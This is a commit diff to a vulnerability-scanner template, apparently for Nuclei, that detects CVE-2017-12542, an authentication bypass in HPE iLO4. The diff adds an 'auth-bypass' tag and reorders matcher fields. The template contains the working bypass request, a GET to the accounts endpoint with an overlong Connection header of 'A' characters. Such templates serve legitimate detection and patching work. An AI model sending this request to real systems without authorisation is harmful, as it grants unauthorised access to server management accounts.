Update CVE-2017-12542.yaml
parent
24f9a7b536
commit
9ba2ae1201
|
@ -12,26 +12,27 @@ info:
|
|||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cve-id: CVE-2017-12542
|
||||
tags: cve,cve2017,ilo4,hpe
|
||||
tags: cve,cve2017,ilo4,hpe,auth-bypass
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
|
||||
|
||||
headers:
|
||||
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "iLO User"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue